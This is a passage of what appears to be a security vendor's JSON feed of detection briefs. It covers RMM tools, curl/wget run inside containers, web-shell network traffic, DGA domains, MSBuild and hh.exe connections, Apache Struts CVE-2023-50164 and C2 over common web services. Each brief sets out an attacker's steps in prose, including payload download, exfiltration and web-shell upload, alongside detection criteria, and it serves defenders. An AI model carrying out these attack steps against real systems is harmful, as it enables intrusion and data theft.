\u003ccode\u003eprocess.name\u003c/code\u003e and \u003ccode\u003eprocess.code_signature.subject_name\u003c/code\u003e criteria in the query.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to ensure the collection of necessary event data for the detection rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the detection rule to determine whether the execution of the RMM tool is authorized and legitimate. 
Refer to the references for a list of commonly abused RMM tools and associated indicators.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-first-time-seen-rmm/","summary":"Detects the execution of previously unseen remote monitoring and management (RMM) tools or remote access software on compromised Windows endpoints, often leveraged for command-and-control, persistence, and execution of malicious commands.","title":"First Time Seen Remote Monitoring and Management Tool Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-first-time-seen-rmm/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Auditd Manager"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","container","auditd","linux"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies instances of \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e being executed from within containers managed by \u003ccode\u003erunc\u003c/code\u003e on Linux systems. The rule leverages Auditd Manager to monitor system calls and flags processes running with the title \u003ccode\u003erunc init\u003c/code\u003e that then execute \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e. This activity is noteworthy because attackers often use these tools to download malicious payloads (stagers, scripts, implants) or to exfiltrate data after compromising a container. While these tools can be used legitimately within containers, their execution in the context of \u003ccode\u003erunc init\u003c/code\u003e suggests a higher risk of malicious activity. The rule focuses on narrowing the signal to the container runtime boundary where unexpected download clients are more worthy of review. 
The rule specifically leverages Auditd Manager for data collection.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a host system, possibly through exploiting a vulnerability in an application running outside the container (e.g., web application).\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a containerized application running on the compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a vulnerability within the container, or abuses a privileged workload within the container, to gain elevated privileges or code execution within the container.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to download additional tools or scripts into the container. These tools might include reverse shells, credential dumping tools, or data exfiltration utilities.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded tools to further compromise the container or the underlying host.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to stage data for exfiltration to an external server. This may involve compressing and encoding data before transmission.\u003c/li\u003e\n\u003cli\u003eThe attacker initiates the data exfiltration process using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to send the staged data to a remote server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, which could include data theft, system disruption, or further lateral movement within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised containers can lead to data breaches, service disruptions, and further attacks on internal systems. 
Successful exploitation could allow attackers to steal sensitive data, install malware, or pivot to other parts of the network, impacting confidentiality, integrity, and availability. The number of affected systems depends on the scope of the container deployment and the privileges granted to the compromised container.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Curl or Wget Execution from Container Context\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Auditd Manager with syscall coverage including \u003ccode\u003eexecve\u003c/code\u003e to capture process execution and arguments within containers, as mentioned in the rule\u0026rsquo;s setup instructions.\u003c/li\u003e\n\u003cli\u003eCorrelate alerts from this rule with network logs to identify the destination IP addresses and domains contacted by the compromised container.\u003c/li\u003e\n\u003cli\u003eBaseline trusted images and exclude stable image digests or namespaces when noisy to reduce false positives, as suggested in the rule\u0026rsquo;s false positives section.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-23T12:00:00Z","date_published":"2024-01-23T12:00:00Z","id":"/briefs/2024-01-curl-wget-container-execution/","summary":"This rule detects the execution of curl or wget from within runc-backed containers on Linux systems monitored by Auditd Manager, indicating potential ingress tool transfer or data exfiltration by attackers who have compromised the container.","title":"Curl or Wget Execution from Container Context","url":"https://feed.craftedsignal.io/briefs/2024-01-curl-wget-container-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["low"],"_cs_tags":["persistence","execution","command-and-control","web 
shell","linux"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule focuses on identifying potentially malicious activity stemming from Linux-based web servers. The rule is triggered when a web server process, such as Apache, Nginx, or others, initiates an outbound network connection to a destination port that is considered non-standard. This activity can signal the presence of a web shell, a malicious script uploaded to a web server to enable remote access and control. Attackers may exploit compromised web servers to establish covert communication channels, exfiltrate data, or launch further attacks on internal systems. The rule leverages data from Elastic Defend to monitor network connections and filter out legitimate traffic based on a predefined list of common ports and internal IP ranges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial access is gained via exploitation of a vulnerability in a web application or web server component running on a Linux system (e.g., through SQL injection or remote code execution).\u003c/li\u003e\n\u003cli\u003eA web shell is uploaded to the compromised web server, often disguised as a legitimate file or hidden within existing directories.\u003c/li\u003e\n\u003cli\u003eThe attacker interacts with the web shell through HTTP requests, using it as a command and control interface.\u003c/li\u003e\n\u003cli\u003eThe web shell executes commands on the server, initiating outbound network connections to non-standard ports.\u003c/li\u003e\n\u003cli\u003eThese connections may be used to communicate with external C2 servers, download additional payloads, or exfiltrate sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the web shell to move laterally within the network, targeting other systems and services.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to establish persistence on the compromised server, ensuring 
continued access even after system reboots.\u003c/li\u003e\n\u003cli\u003eThe final objective is data theft, system compromise, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised web servers can lead to significant data breaches, system downtime, and reputational damage. While this rule triggers on low-severity behavior, successful exploitation can lead to complete system compromise. The number of affected systems depends on the scope of the initial vulnerability and the attacker\u0026rsquo;s ability to move laterally. Organizations in all sectors that rely on web-based applications are potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect web server processes initiating connections to unusual destination ports and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Elastic Defend integration to collect the necessary network event data from Linux endpoints to activate the rule.\u003c/li\u003e\n\u003cli\u003eReview and customize the list of excluded destination ports and internal IP ranges in the Sigma rule to match your organization\u0026rsquo;s specific network configuration and legitimate traffic patterns.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the rule to determine if the activity is malicious or benign, focusing on the process name, user, destination IP, and destination port.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T18:28:00Z","date_published":"2024-01-09T18:28:00Z","id":"/briefs/2024-01-uncommon-web-server-port/","summary":"The rule identifies unusual outbound network connections on non-standard ports originating from web server processes on Linux systems, indicative of potential web shell activity or unauthorized communication.","title":"Uncommon Destination Port Connection by Web 
Server on Linux","url":"https://feed.craftedsignal.io/briefs/2024-01-uncommon-web-server-port/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["low"],"_cs_tags":["dga","command-and-control","machine-learning"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis brief describes a detection of potential DGA (Domain Generation Algorithm) activity identified by an Elastic machine learning job. DGAs are often used by malware for command and control (C2) communication, generating domain names dynamically to evade detection. The machine learning job, \u003ccode\u003edga_high_sum_probability_ea\u003c/code\u003e, analyzes DNS requests to identify source IP addresses that exhibit a high probability of DGA activity. This detection relies on the DGA Detection integration, which includes an ML-based framework to detect DGA activity in DNS events. The integration requires Fleet and DNS events collected by integrations such as Elastic Defend, Network Packet Capture, or Packetbeat. This activity matters for defenders because successful DGA-based C2 channels can allow malware to maintain communication and control even when individual malicious domains are blocked.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises a host within the network, potentially through unpatched vulnerabilities or social engineering.\u003c/li\u003e\n\u003cli\u003eMalware is deployed on the compromised host. 
This malware contains a DGA.\u003c/li\u003e\n\u003cli\u003eThe malware uses the DGA to generate a list of potential domain names.\u003c/li\u003e\n\u003cli\u003eThe compromised host initiates DNS requests to resolve the generated domain names.\u003c/li\u003e\n\u003cli\u003eThe DNS requests are sent to internal or external DNS servers.\u003c/li\u003e\n\u003cli\u003eThe machine learning job \u003ccode\u003edga_high_sum_probability_ea\u003c/code\u003e analyzes the DNS requests, specifically looking for source IPs with a high aggregate probability of generating DGA domains.\u003c/li\u003e\n\u003cli\u003eIf the anomaly score exceeds the threshold (70), an alert is triggered.\u003c/li\u003e\n\u003cli\u003eThe malware successfully establishes a C2 channel with a dynamically generated domain, enabling further malicious activities such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful exploitation of DGA-based command and control can lead to persistent malware infections, data exfiltration, and further compromise of systems within the network. While the severity is rated low, the potential impact can escalate quickly if the C2 channel is used for more damaging activities. 
This detection focuses on identifying potential DGA activity, enabling security teams to investigate and prevent further damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnsure the DGA Detection integration is installed and properly configured, including the machine learning job \u003ccode\u003edga_high_sum_probability_ea\u003c/code\u003e (references: \u003ca href=\"https://docs.elastic.co/en/integrations/dga\"\u003eElastic DGA Detection documentation\u003c/a\u003e, \u003ca href=\"https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html\"\u003eprebuilt ML jobs\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eVerify that DNS events are being collected by Elastic Defend, Network Packet Capture, or Packetbeat and that the data view used by the machine learning job includes these events (references: \u003ca href=\"https://docs.elastic.co/en/integrations/endpoint\"\u003eElastic Defend\u003c/a\u003e, \u003ca href=\"https://docs.elastic.co/integrations/network_traffic\"\u003eNetwork Packet Capture\u003c/a\u003e, \u003ca href=\"https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-overview.html\"\u003ePacketbeat\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eTune the anomaly threshold (currently 70) in the machine learning job based on your environment to reduce false positives and ensure timely detection of DGA activity.\u003c/li\u003e\n\u003cli\u003eReview and implement the triage and analysis steps outlined in the rule\u0026rsquo;s note section, focusing on identifying the source IP, analyzing DNS request patterns, and cross-referencing domains with threat intelligence feeds.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T15:00:00Z","date_published":"2024-01-09T15:00:00Z","id":"/briefs/2024-01-dga-activity/","summary":"A machine learning job detected potential DGA (domain generation algorithm) activity indicative of malware command and control (C2) channels, 
identifying source IP addresses making DNS requests with a high probability of being DGA-generated, a technique used by adversaries to evade detection.","title":"Potential DGA Activity Detected by Machine Learning","url":"https://feed.craftedsignal.io/briefs/2024-01-dga-activity/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["MSBuild"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","command-and-control","msbuild"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may abuse the Microsoft Build Engine (MSBuild) to execute malicious files or masquerade as legitimate utilities to bypass detections and evade defenses. MSBuild is a platform for building applications using an XML schema for project files that controls how the build platform processes and builds software. The observed behavior involves MsBuild.exe initiating outbound network connections, which is not typical for its intended use and may indicate unauthorized code execution or command and control activity. This activity can be used to download malicious payloads, exfiltrate data, or establish a reverse shell. 
Detecting this behavior is crucial as it can be an early indicator of compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access through an external vector (e.g., phishing, software vulnerability).\u003c/li\u003e\n\u003cli\u003eAttacker executes MsBuild.exe.\u003c/li\u003e\n\u003cli\u003eMSBuild executes a malicious project file (.csproj, .vbproj).\u003c/li\u003e\n\u003cli\u003eThe project file contains embedded or referenced code (e.g., C#, VB.NET) designed to perform malicious actions.\u003c/li\u003e\n\u003cli\u003eThe malicious code executes, initiating a network connection.\u003c/li\u003e\n\u003cli\u003eThe network connection is established to an external command and control (C2) server or a resource hosting a malicious payload.\u003c/li\u003e\n\u003cli\u003eData exfiltration or payload download occurs via the network connection.\u003c/li\u003e\n\u003cli\u003eThe attacker gains further control over the compromised system, potentially leading to lateral movement or data theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised systems can lead to data breaches, system instability, and further propagation of malware within the network. Successful exploitation can result in sensitive information being stolen, disruption of services, and potential financial losses. 
This activity can be difficult to detect without specific monitoring rules and can lead to extended dwell time for attackers within the compromised environment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eMSBuild Making Outbound Network Connection\u003c/code\u003e to your SIEM to detect suspicious network connections initiated by MsBuild.exe.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the destination IP addresses and the content of the network traffic.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for instances of MsBuild.exe executing unusual or suspicious project files.\u003c/li\u003e\n\u003cli\u003eEnable process monitoring with command-line argument logging to identify potential malicious project files being passed to MsBuild.exe.\u003c/li\u003e\n\u003cli\u003eConsider implementing application control policies to restrict the execution of MsBuild.exe to authorized users and processes only.\u003c/li\u003e\n\u003cli\u003eBlock known malicious domains and IP addresses associated with command and control activity at the firewall or DNS resolver.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T12:00:00Z","date_published":"2024-01-09T12:00:00Z","id":"/briefs/2024-01-09-msbuild-network-connections/","summary":"MsBuild.exe making outbound network connections may indicate adversarial activity as attackers leverage MsBuild to execute code and evade detection.","title":"MSBuild Making Network Connections Indicating Potential Defense Evasion","url":"https://feed.craftedsignal.io/briefs/2024-01-09-msbuild-network-connections/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2023-50164"}],"_cs_exploited":false,"_cs_products":["Struts 
2"],"_cs_severities":["high"],"_cs_tags":["apache-struts","webshell","cve-2023-50164","initial-access","persistence","command-and-control"],"_cs_type":"advisory","_cs_vendors":["Apache"],"content_html":"\u003cp\u003eCVE-2023-50164 is a critical path traversal vulnerability affecting Apache Struts 2 versions prior to 2.5.33 or 6.3.0.2. The vulnerability resides in the file upload functionality, allowing attackers to manipulate file upload parameters and write malicious files, such as JSP web shells, to arbitrary locations on the web server. Successful exploitation leads to remote code execution. Detection focuses on correlating suspicious file upload requests to Struts endpoints with subsequent creation of JSP files in web-accessible directories, indicating successful exploitation. The attack involves crafting malicious multipart/form-data POST requests with WebKitFormBoundary to Struts .action upload endpoints.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker sends a malicious HTTP POST request to a vulnerable Apache Struts endpoint (e.g., \u003ccode\u003e*.action\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe HTTP POST request contains a \u003ccode\u003emultipart/form-data\u003c/code\u003e content type with a \u003ccode\u003eWebKitFormBoundary\u003c/code\u003e string.\u003c/li\u003e\n\u003cli\u003eThe request exploits CVE-2023-50164, leveraging a path traversal vulnerability in the file upload process.\u003c/li\u003e\n\u003cli\u003eThe attacker bypasses security controls due to the path traversal vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads a malicious JSP file (web shell) to a web-accessible directory, such as Tomcat\u0026rsquo;s \u003ccode\u003ewebapps\u003c/code\u003e directory.\u003c/li\u003e\n\u003cli\u003eA Java process (e.g., Tomcat) creates the JSP web shell file in the webapps directory.\u003c/li\u003e\n\u003cli\u003eThe attacker accesses the deployed web 
shell via HTTP.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary commands on the server through the web shell.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2023-50164 allows attackers to achieve remote code execution on the affected server. This can lead to complete system compromise, data exfiltration, deployment of malware, and lateral movement within the network. The vulnerability affects Apache Struts 2 applications using the file upload feature, potentially impacting numerous organizations across various sectors using the framework.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Apache Struts CVE-2023-50164 Webshell Creation\u0026rdquo; to detect JSP file creation events in webapps directories following suspicious POST requests as described in the overview.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Apache Struts CVE-2023-50164 Suspicious POST Request\u0026rdquo; to detect suspicious POST requests to Struts endpoints with \u003ccode\u003emultipart/form-data\u003c/code\u003e content containing \u003ccode\u003eWebKitFormBoundary\u003c/code\u003e, as indicated in the Attack Chain.\u003c/li\u003e\n\u003cli\u003ePatch Apache Struts 2 to version 2.5.33, 6.3.0.2, or higher to remediate the CVE-2023-50164 vulnerability, as noted in the References.\u003c/li\u003e\n\u003cli\u003eEnable HTTP request body capture in network traffic monitoring tools to detect the multipart/form-data content containing WebKitFormBoundary indicators, as required by the rule setup.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-05T18:22:00Z","date_published":"2024-01-05T18:22:00Z","id":"/briefs/2024-01-apache-struts-cve-2023-50164-webshell/","summary":"Exploitation of CVE-2023-50164, a critical path traversal vulnerability in Apache Struts 2, is detected by 
identifying malicious multipart/form-data POST requests with WebKitFormBoundary targeting Struts .action upload endpoints, followed by JSP web shell creation in Tomcat's webapps directories, indicating remote code execution.","title":"Apache Struts CVE-2023-50164 Exploitation Leading to Web Shell Deployment","url":"https://feed.craftedsignal.io/briefs/2024-01-apache-struts-cve-2023-50164-webshell/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["OneDrive","Chrome","Brave","Opera","Discord","Slack","Microsoft 365","SharePoint"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","windows","threat-detection"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Google","Brave Software","Opera","Discord","Slack"],"content_html":"\u003cp\u003eAdversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. This detection focuses on identifying connections from Windows hosts to a predefined list of commonly abused web services from processes running outside of typical program installation directories, indicating a potential C2 channel leveraging legitimate services. 
The rule aims to detect this behavior by monitoring network connections and DNS requests originating from unusual locations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial access is achieved via an unknown method (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eMalware is installed on the victim\u0026rsquo;s system, likely outside typical program directories.\u003c/li\u003e\n\u003cli\u003eThe malware establishes a DNS connection to a commonly abused web service (e.g., pastebin.com, raw.githubusercontent.com) to obscure C2 traffic.\u003c/li\u003e\n\u003cli\u003eThe malware sends encrypted or encoded commands to the web service.\u003c/li\u003e\n\u003cli\u003eThe web service acts as an intermediary, relaying the commands to the attacker\u0026rsquo;s C2 server.\u003c/li\u003e\n\u003cli\u003eThe C2 server responds with instructions, which are then relayed back to the compromised host through the same web service.\u003c/li\u003e\n\u003cli\u003eThe malware executes the received commands, potentially leading to data exfiltration, lateral movement, or other malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistent access and control over the compromised system using the web service as a hidden C2 channel.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to data theft, system compromise, and further propagation within the network. Since commonly used web services are utilized, the malicious activity can blend in with legitimate network traffic, making it difficult to detect. 
The impact can range from minor data breaches to complete network compromise, depending on the attacker\u0026rsquo;s objectives and the level of access gained.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Commonly Abused Web Services via DNS\u003c/code\u003e to your SIEM to identify suspicious DNS queries to known C2 web services originating from anomalous processes.\u003c/li\u003e\n\u003cli\u003eEnable DNS query logging on Windows endpoints to provide the data source required for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eReview network connection logs for processes outside standard installation directories communicating with domains listed in the \u003ccode\u003equery\u003c/code\u003e section of the Sigma rule to identify potential C2 activity.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of compromised hosts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T12:00:00Z","date_published":"2024-01-04T12:00:00Z","id":"/briefs/2024-01-04-c2-web-services/","summary":"This rule detects command and control activity using common web services by identifying Windows hosts making DNS requests to a list of commonly abused web services from processes outside of known program locations, potentially indicating adversaries attempting to blend malicious traffic with legitimate network activity.","title":"Detection of Command and Control Activity via Commonly Abused Web Services","url":"https://feed.craftedsignal.io/briefs/2024-01-04-c2-web-services/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Internet Explorer"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","com","iexplore","windows"],"_cs_type":"threat","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies potential command and control (C2) activity abusing Internet Explorer 
(iexplore.exe) via the Component Object Model (COM) on Windows systems. The technique involves launching iexplore.exe through COM, often using system binaries like \u003ccode\u003erundll32.exe\u003c/code\u003e or \u003ccode\u003eregsvr32.exe\u003c/code\u003e to proxy the execution and evade security controls. The rule focuses on identifying unusual DNS queries originating from iexplore.exe, excluding those directed towards common Microsoft and OCSP-related domains. This tactic allows adversaries to make network connections appearing benign while hosting malicious content or performing C2 functions. The rule is designed for environments using Elastic Defend. The rule was last updated on 2026/05/04.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAdversary gains initial access to the targeted system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe adversary uses \u003ccode\u003erundll32.exe\u003c/code\u003e or \u003ccode\u003eregsvr32.exe\u003c/code\u003e to load \u003ccode\u003eIEProxy.dll\u003c/code\u003e, which is used to instantiate Internet Explorer via COM.\u003c/li\u003e\n\u003cli\u003eIexplore.exe is launched as a child process of \u003ccode\u003erundll32.exe\u003c/code\u003e or \u003ccode\u003eregsvr32.exe\u003c/code\u003e with the \u003ccode\u003e-Embedding\u003c/code\u003e flag, indicating it was started via COM.\u003c/li\u003e\n\u003cli\u003eIexplore.exe initiates DNS queries to resolve domains for command and control communication or to retrieve malicious payloads.\u003c/li\u003e\n\u003cli\u003eThe DNS queries bypass typical whitelists by using uncommon or attacker-controlled domains.\u003c/li\u003e\n\u003cli\u003eIexplore.exe establishes network connections to external IP addresses associated with the malicious domains.\u003c/li\u003e\n\u003cli\u003eData is exfiltrated or further commands are received through the established 
connections.\u003c/li\u003e\n\u003cli\u003eThe adversary maintains persistence and control over the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows adversaries to establish a covert command and control channel, potentially leading to data theft, system compromise, or further propagation within the network. The use of Internet Explorer, a trusted system binary, helps evade detection and bypass host-based firewalls. The impact can range from individual workstation compromise to broader network breaches, depending on the attacker\u0026rsquo;s objectives.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003ePotential Command and Control via Internet Explorer\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the parent processes (\u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003eregsvr32.exe\u003c/code\u003e) and the destination domains of the DNS queries.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for instances of \u003ccode\u003eiexplore.exe\u003c/code\u003e being launched with the \u003ccode\u003e-Embedding\u003c/code\u003e flag, especially when the parent process is \u003ccode\u003erundll32.exe\u003c/code\u003e or \u003ccode\u003eregsvr32.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eReview network connection logs for \u003ccode\u003eiexplore.exe\u003c/code\u003e to identify any unusual or suspicious outbound connections to domains not associated with standard Microsoft services or internal resources.\u003c/li\u003e\n\u003cli\u003eImplement network-level controls to block communication with any identified malicious 
domains.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T18:12:00Z","date_published":"2024-01-03T18:12:00Z","id":"/briefs/2024-01-iexplore-com-c2/","summary":"This rule detects potential command and control activity where Internet Explorer (iexplore.exe) is started via the Component Object Model (COM) and makes unusual network connections, indicating adversaries might exploit Internet Explorer via COM to evade detection and bypass host-based firewall restrictions.","title":"Potential Command and Control via Internet Explorer COM Abuse","url":"https://feed.craftedsignal.io/briefs/2024-01-iexplore-com-c2/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["HTML Help"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","command-and-control","malicious-file","html-help"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAdversaries may conceal malicious code in a compiled HTML file (.chm) and deliver it to a victim for execution. CHM content is loaded by the HTML Help executable program (hh.exe). Attackers can use CHM files to proxy the execution of malicious payloads via a signed binary to bypass security controls, and also to gain initial access to environments via social engineering methods. This rule identifies network connections done by hh.exe, which can potentially indicate abuse to download malicious files or tooling, or masquerading. 
The detection logic focuses on network connections originating from hh.exe to external IPs, excluding private or reserved IP ranges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe user receives a compiled HTML file (.chm), often through social engineering tactics such as phishing.\u003c/li\u003e\n\u003cli\u003eThe user opens the .chm file, which is then executed by the HTML Help executable (hh.exe).\u003c/li\u003e\n\u003cli\u003eThe hh.exe process loads and renders the HTML content within the .chm file.\u003c/li\u003e\n\u003cli\u003eEmbedded within the HTML content is malicious JavaScript or other scripting code.\u003c/li\u003e\n\u003cli\u003eThe malicious script executes, initiating a network connection via hh.exe to an external server.\u003c/li\u003e\n\u003cli\u003eThe external server hosts a malicious payload, such as a reverse shell or an executable file.\u003c/li\u003e\n\u003cli\u003eHh.exe downloads the malicious payload to the victim\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed, granting the attacker initial access or performing other malicious actions like data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to initial access to a victim\u0026rsquo;s system, potentially bypassing security controls through a signed Microsoft binary. This can result in the download and execution of arbitrary payloads, leading to data exfiltration, lateral movement within the network, or installation of malware. The exploitation can spread rapidly through social engineering, affecting multiple users within an organization. 
While the severity is rated as medium, the potential for escalation to a critical compromise is high if the attacker gains a foothold in the environment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process and network monitoring on Windows endpoints, focusing on hh.exe activity (Data Source: Elastic Defend, Sysmon, SentinelOne).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eNetwork Connection via Compiled HTML File\u003c/code\u003e to your SIEM and tune for your environment to detect suspicious network connections initiated by hh.exe.\u003c/li\u003e\n\u003cli\u003eMonitor for hh.exe spawning child processes, which could indicate the execution of downloaded payloads. Create a Sigma rule to detect such events.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised host and restrict lateral movement.\u003c/li\u003e\n\u003cli\u003eConduct regular security awareness training to educate users about the risks of opening unsolicited .chm files.\u003c/li\u003e\n\u003cli\u003eInspect the digital signatures of hh.exe and other system binaries to ensure their integrity and authenticity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T17:00:00Z","date_published":"2024-01-03T17:00:00Z","id":"/briefs/2024-01-hh-exe-network-connection/","summary":"This rule detects network connections initiated by hh.exe, the HTML Help executable, which may indicate the execution of malicious code embedded in compiled HTML 